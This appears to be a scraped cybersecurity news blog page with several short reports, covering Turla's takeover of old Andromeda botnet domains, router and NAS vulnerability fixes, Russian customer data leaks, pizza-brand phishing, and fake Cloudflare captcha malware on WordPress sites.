Home Blog

Hack group Turla took over the infrastructure of the old Andromeda botnet

Hack group Turla

Analysts at Mandiant reported that the Russian-speaking cyber-espionage group Turla seized the control servers of the old Andromeda botnet, closed by the authorities and information security specialists back in 2017. Andromeda’s C&C servers appear to have been used by Turla to scrutinize compromised hosts to find ones suitable for intelligence and espionage operations.

Google-owned Mandiant tracks this Turla operation as UNC4210 Threat Cluster. The researchers write that the servers hijacked by hackers match Andromeda malware samples (also known as Gamarue and Wauchos), which were uploaded to VirusTotal back in 2013.

The researchers explain that Turla members waited until the registration of a number of domains expired and seized part of the old botnet infrastructure, which was liquidated back in 2017. Let me remind you that at that time the botnet was literally closed by the whole world. The joint operation involved the FBI, Interpol, Europol Cyber ​​Unit (EC3), Eurojust, the Joint Cybercrime Task Force (J-CAT), as well as German law enforcement agencies. The private sector, in turn, was represented by specialists from Microsoft, ESET, Registrar of Last Resort, as well as ICANN, FKIE, BSI and many others.

“Back in September 2022, UNC4210 re-registered at least three ANDROMEDA C&C domains after their registration expired and began profiling victims for the selective deployment of KOPILUWAK and QUIETCANARY,” Mandiant experts say.

Thus, Mandiant believes that Turla is using old Andromeda infections as a mechanism to distribute its own malware, and may also take advantage of the fact that Andromeda could be distributed via infected USB drives.

“Malware spreading over USB continues to be a useful vector for gaining initial access to an organization’s networks,” the report notes. “As the old ANDROMEDA malware continues to spread via compromised USB devices, re-registered domains are a danger as new attackers can take control of them and deliver new malware to victims.”

For example, in one incident analyzed by Mandiant analysts, an infected USB drive was used on the machine of an unnamed Ukrainian organization in December 2021. This resulted in an outdated version of Andromeda being deployed on the host when running a malicious link (.LNK) file masquerading as a folder on a USB drive.

Since the attackers used one of the domains seized in January 2022 (which used to be part of the botent infrastructure) to profile victims, the command and control server transferred the KOPILUWAK dropper, a JavaScript utility for network reconnaissance, to this infected machine.

Two days later, on September 8, 2022, the attack entered its final phase with the introduction of the QUIETCANARY malware (also known as  Tunnus ), which eventually led to the theft of files from the victim’s system.

“Used by widespread, financially motivated malware, this new technique for hijacking expired domains could provide a secondary compromise to a wide range of organizations. In addition, old malware and its infrastructure may be overlooked by defenders who sort out various warnings, ”the experts warned.

Catch up on more articles here

Follow us on Twitter here

Synology Fixes Critical Vulnerability in VPN Routers

VPN Routers

A Taiwanese manufacturer has fixed a vulnerability that scored 10 out of 10 on the CVSS vulnerability rating scale. The issue affected routers configured to act as VPN servers using Synology VPN Plus Server.

The vulnerability has been identified as CVE-2022-43931 and is described as an out-of-bounds entry bug related to the remote desktop functionality of Synology VPN Plus Server.

The manufacturer said that the successful exploitation of this bug, discovered by the company’s own security team, “allows remote attackers to execute arbitrary commands through arbitrary vectors.” However, it is known that exploitation of the vulnerability does not require privileges on the target routers or any user interaction.

As a result, VPN Plus Server for Synology Router Manager (SRM) 1.2 and VPN Plus Server for SRM 1.3 users are advised to upgrade to version 1.4.3-0534 and 1.4.4-0635 as soon as possible.

It is also worth noting that Synology engineers have also warned of several bugs in SRM that allow remote attackers to execute arbitrary commands, carry out denial of service attacks, and read arbitrary files.

The exact details of these vulnerabilities have not been disclosed, but users are strongly advised to upgrade to versions 1.2.5-8227-6 and 1.3.1-9346-3 to mitigate potential risks.

Interestingly, a number of vulnerabilities in Synology devices were demonstrated at the Pwn2Own hacker competition, which took place in mid-December. Although Synology did not list the CVE IDs for these issues, it appears that these are the bugs discovered and exploited by the researchers at Pwn2Own.

Catch up on more articles here

Follow us on Twitter here

WhatsApp fights censorship and launches support for proxy servers

WhatsApp fights censorship

WhatsApp developers have announced that now the messenger will support connection through proxy servers, in case the government blocks the service in the user’s country or there are Internet outages. The new option is already available for all users of the latest versions of WhatsApp for iOS and Android.

“We continue to fight for your right to free and confidential communication. Now, even if a direct connection to WhatsApp is not possible, you can stay connected through a server created by volunteers and organizations that help others communicate freely, the developers write in their announcement. “With this feature, everyone will have access to WhatsApp, even if the Internet connection in the region is blocked or interrupted.”

The official announcement emphasizes that connecting through a proxy still ensures the privacy and security of communication since user messages are still protected by end-to-end encryption. That is, no one on the side of the proxy server, Meta* or WhatsApp will be able to read them.

At the same time, as you can see in the screenshot below when you turn on the proxy server, the user is warned that his IP address may be visible to the proxy provider.

The developers also write that creating your own proxy server is not difficult at all, and publish instructions for setting it up.

“We hope that in 2023 no one will have to deal with internet outages. Internet access restrictions that have been in place in Iran for months are a violation of human rights and prevent people from receiving emergency care. If such cases are repeated, our solution will help people maintain safe and reliable communication with each other, ”the developers summarize.

* Meta Platforms is recognized as an extremist organization and its activities are banned in Russia

Catch up on more articles here

Follow us on Twitter here

The company Sportmaster leaked customer data


In the last days of 2022, the data of the customers of the Sportmaster chain of stores were published online. IIB experts reported that the dump contains about 100,000,000 lines. The company confirmed that the names, dates of birth, phone numbers and email addresses of customers were indeed at the disposal of the attackers.

This leak was reported by several Telegram channels at once, including Data1eaks and Data Leakage & Breach Intelligence (DLBI) specialists. According to experts, the dump was published by the same attackers who previously stood behind the “drains” of data from the Vkusvill online store, the GeekBrains educational platform, the Russian Post, and many other companies and organizations.

The researchers report that the text file published on December 31 contained 1,655,406 lines (269,499 unique email addresses and 1,316,510 unique mobile and home phone numbers), and the most recent entry was dated August 2021.

A few days after the publication of the first file, the hackers made public the second, containing almost 100,000,000 lines. This time, the most recent (and only new) entry in the new file was dated November 16, 2022, however, DLBI experts note that the vast majority of the lines still refer to 2010-2013, and the data from the first (smaller) file is duplicated in the second part “plum”.

Both of these dumps include the following client information:

  • Email address (13.4 million unique addresses);
  • Mobile and home phone (45.89 million unique numbers);
  • The address;
  • Date of Birth;
  • Floor

Representatives of “Sportmaster” confirmed the authenticity of this leak.

“On December 31, an archive with the data of Sportmaster’s clients was published in one of the Telegram channels. Names, dates of birth, phone numbers and email addresses were at the disposal of the attackers. Based on the results of the study of the archive, it was confirmed that the incident does not affect user logins and passwords, payment information, as well as employee credentials, ”the company said.

It is reported that the company is already investigating and finding out the causes of the incident. According to preliminary data, the leak occurred through one of the company’s contractors, who had access to the specified information. According to the analysis already carried out, the data that got into the network could be dated to 2019.

Catch up on more articles here

Follow us on Twitter here

SoundCloud service blocked in Russia at the request of the Prosecutor General’s Office

SoundCloud service

Roskomnadzor blocked the SoundCloud music service in Russia after receiving a request from the Prosecutor General’s Office dated September 22. SoundCloud is already present in the registry of prohibited information.

It is reported that Article 15.3 of the Law “On Information” became the basis for blocking, which regulates the restriction of access to information containing calls for mass riots and participation in unauthorized actions, extremism, as well as unreliable publicly significant information distributed under the guise of reliable messages (that there are fakes).

Since the site uses the HTTPS protocol, blocking one of the pages leads to the unavailability of the entire site on the territory of the Russian Federation.

The department explained that the reason for the blocking was the spread of fakes about the Russian special operation in Ukraine.

“At the request of the Prosecutor General’s Office of Russia, Roskomnadzor restricted access to the SoundCloud service in connection with the placement of materials containing false information regarding the nature of the special military operation on the territory of Ukraine, its form, methods of conducting hostilities (attacks on civilians, strikes on civilian infrastructure), about numerous casualties among the civilian population at the hands of Russian soldiers, ”the press service of Roskomnadzor reported.

Let me remind you that SoundCloud began its work in 2008 and is still used as a platform for distributing music and podcasts.

Catch up on more articles here

Follow us on Twitter here

Positive Technologies Helps Fix Vulnerability in ASUSTOR NAS


Positive Technologies expert Nikita Abramov has discovered a vulnerability in the ASUSTOR Data Master (ADM) operating system, which is used to manage NAS devices. An attacker could remotely execute arbitrary code on the operating system of NAS devices.

The issue was identified as CVE-2022-37398  ( BDU:2022-05028 ) and rated 7.1 out of 10 on the CVSS v3 scale, which corresponds to a high severity level.

It is noted that at present, the IP addresses of about 3,700 potentially vulnerable NAS devices can be found on the Internet. Most of these devices were seen in Taiwan, China, South Korea, Germany, USA, France, Russia, Japan, Hong Kong, and Singapore.

The discovered vulnerability affects several versions of ASUSTOR Data Master: 3.5.9.RUE3, 4.0.5.RVI1, 4.1.0.RJD1, as well as earlier software versions.

As a workaround, device administrators can disable the WebDAV protocol. To fully address the vulnerability, ASUSTOR recommends updating affected product versions to the following or newer versions:

  • ADM 4.1 needs to be upgraded to version 4.1.0.RKM1;
  • ADM 4.0 needs to be upgraded to version 4.0.5.RWM1;
  • ADM 3.5 needs to be upgraded to version 3.5.9.RWM1.

“When using buffer overflow vulnerabilities, as in this case, the attacker gets the opportunity to use the attacked subroutine to write beyond the boundaries of the allocated buffer. Sometimes this can lead to a violation of the program logic, to a denial of service (DoS), or, in some cases, to the execution of arbitrary code, which allows various scripts to be executed on the side of the attacked host,” says Nikita Abramov. – For example, install malware to intercept data, use encryption programs, and download confidential data. Very often, such errors occur when there is no check for the maximum length of the received data or when it is processed incorrectly. In this case, successfully executing the code on the attacked device allows an error that occurs when working with the header of the incoming request,

Catch up on more articles here

Follow us on Twitter here

Fraudsters send out chain letters from Dodo Pizza and Papa Johns again

Dodo Pizza

In September, 100 fake resources “Dodo Pizza” and “Papa John’s” were discovered. Swindlers write off 900 instead of one ruble and take bank card data.

The scammers are back with pizza. The scheme we wrote about in early September is still relevant. Group-IB specialists spoke about a new portion of fake sites Dodo Pizza and Papa Johns.

Fake sites are distributed using the “chain letters” method – a survey participant on a fake site needs to send a link to 20 friends.

There are more than 100 scam sites in the “autumn catch” of experts. Those who wanted to get pizza for 1 ruble entered their bank card details, but 899 rubles were debited from the account. In addition, the “plastic” itself was compromised.

Fake Papa John’s sites offer a 25% discount. You can pay for the order only by card, and an additional zero is added to the cost. So, when ordering for 1300 rubles, 13,000 rubles were debited from the account.

“ Raffle prizes under the guise of a survey or a nice discount on behalf of well-known brands is a very popular type of scam, ” recalls Evgeny Egorov, Group-IB Lead Analyst of the Digital Risk Protection Department. “ According to our estimates, the number of cases of such online fraud increased by 579% in the first half of the year alone .”

Pizzerias attract scammers more than other types of fast food. In August, scammers offered to win pizza on behalf of well-known Russian banks. Cardholders themselves complained about such “shares”. The scam has been stopped.

A year ago, the same networks “Dodo Pizza” and “Papa John’s” faced an attack by clone sites — 160 phishing sites were blocked in May-July. The approximate damage to Dodo Pizza customers amounted to 2.79 million rubles. The Papa Johns company estimated the losses at 1.5 million rubles. For half a year.

Catch up on more articles here

Follow us on Twitter here

Data of millions of DNS users leaked to the network

DNS users

Data of millions of DNS users leaked to the network

Over the weekend, Data Leakage & Breach Intelligence (DLBI) experts warned that a partial dump with information about buyers of the DNS electronics store (dns-shop.ru) got into the network. The leak is dated late September and contains 16,524,282 entries.

According to experts, the information was published by the same source that last month leaked information about the clients of another large online store – Online Trade (onlinetrade.ru),  Delivery Club delivery service, GeekBrains educational platform, Russian Post, and so on.

A partial DNS dump contains the following user data:

  • First name / last name (not for everyone);
  • Email address (7.7 million unique addresses);
  • Telephone (11.4 million unique numbers);
  • Username

Judging by the information from the dump, it was made no earlier than September 19, 2022.

The researchers also note that another SQL dump of this store, dated June 12, 2008 (and not 2013, as indicated in the file name) has been in the public domain for quite a long time and even contains hashed user passwords.

Representatives of the DNS have already published an official statement in which they confirmed the leakage of personal data of customers and employees. The company reports that an investigation into the incident is currently underway, and work is underway to eliminate the consequences of the attack.

“We see that the attack was carried out by a group of hackers. Hacking was carried out from servers located outside the Russian Federation. We have already found gaps in the protection of our information infrastructure and are working to strengthen information security in the company, ”the DNS says.

It is also emphasized that the attackers did not steal user passwords and bank card data, which, in principle, were not stored on the store’s servers.

Catch up on more articles here

Follow us on Twitter here

Network hackers find the right vulnerability in less than 10 hours

Network hackers

A recent survey showed that a modern attacker finds a vulnerability that helps bypass network perimeter protection in less than ten hours. After an exploit, getting out of the compromised system takes less than five hours in half of the cases.

The survey, which allows to estimate the time for which organizations can detect and stop a hacker attack, was conducted by the American Institute for Research and Improvement of Information Security Specialists (SANS) and information security provider Bishop Fox. More than 300 ethical hackers from different countries took part in the survey.

Almost two-thirds of the respondents have experience in the profile (network security, pentest, application security, etc.) from one to six years, about 30% – from seven to 20 years. The best results in gaining access to the target network were shown by cloud security checkers.

Most often, hackers use vulnerable settings, software developer errors, and poorly protected web services for this purpose. Nearly two-thirds of those surveyed said that after penetrating the internal network, they can collect data and display it in five hours, and 41% in two hours or less.

“Five or six hours of hacking is no surprise to me, I’m an ethical hacker myself,” Tom Eston, Bishop Fox’s associate vice president of consulting, told Dark Reading. “The results are in line with what we see in real-life hacks using social engineering, phishing and other vectors.”

Nearly three-quarters of survey participants believe that many organizations lack the detection and response capabilities to stop an attack and thereby limit the damage.

The most cost-effective vectors of hacker attacks, according to respondents, are social engineering and phishing (49% of responses). A quarter of respondents for the same reasons preferred attacks on web applications, cracking passwords and ransomware.

The full survey report can be downloaded from the Bishop Fox website (in exchange for your data). The event threw new data into the treasury of information security experts who set a goal to help businesses repel hacker attacks with minimal losses.

For example, the CrowdStrike team recently found that it takes the average hacker less than an hour and a half to leave the entry point and attack other systems on the corporate network. The results obtained by Positive Technologies a year ago are more modest – an average of two days, with a previously set lower limit of half an hour. And ransomware is usually launched into the network three days after being hacked.

Catch up on more articles here

Follow us on Twitter here

Hackers use fake CloudFlare captcha to hide Trojan download

CloudFlare captcha

Sucuri is seeing the development of a campaign launched in August aimed at seeding the RAT in conjunction with a drive-by infostealer. Attackers inject JavaScript into WordPress sites, which displays a fake page of the Cloudflare security service and prompts the visitor to download some software to complete the check.

Malicious JavaScript injections are carried out by adding three lines of code to CMS core components, theme or plugin files. The number of sites infected in the course of new attacks is small – less than 1,000; in almost half of the cases, the unsolicited appendage was found in /wp-includes/js/jquery/jquery.min.js.

Previously, this script downloaded the content it needed to work (at the time, a fake Cloudflare DDoS protection warning) from the adogeevent[.]com domain. The new JavaScript variants request different domains, although the IP address remains the same.

Downloadable content has also changed. Now, a potential victim is presented with a CAPTCHA dialogue, supposedly pulled from the Cloudflare server.

When you enter any value in the specified field (even the correct one), a hint pops up: to gain access to the site, you must complete the verification; if you have any problems, download our software so you don’t waste time on tests anymore.

Clicking on the inserted Download button downloads the .iso file, followed by unpacking the malicious content – CLOUDFLA.EXE or Cloudflare_security_installer.exe. To reinforce the illusion of legitimacy and divert attention, the Google Chrome update process is launched in the system: it is noteworthy that the updater uses the Russian language.

Meanwhile, RAT, the NetSupport remote administration tool favoured by SocGholish ransomware, is being installed into the system in the background. This payload, according to analysts, has remained the same. However, only two dozen antiviruses from the VirusTotal collection (as of September 15) recognize it.

In addition to the RAT, the victim, as before, receives a Racoon infostealer . Jerome Segura from Malwarebytes has a different opinion about the malware – the expert believes that this is an Amadey Trojan with a C2 server in the States. Kaspersky products and some other scanners detect a malicious kit with the verdict “banking Trojan” – it is possible that the infection can result in financial losses.

Sucuri experts recorded a similar attack but using another fake CloudFlare page – a warning about blocking access.

At the same time, a Trojan file weighing 669.9 MB was offered for download. Apparently, the author of the attack was trying to bypass antiviruses in this way, which usually skip large files due to the size limit. The payload also included a note advising to run the executable, ostensibly to clean the system registry, but then the malware could be detected using behavioural analysis and heuristics.

Analysts also noted the case of hosting a payload on GitLab. The fraudulent account has already been blocked.

Catch up on more articles here

Follow us on Twitter here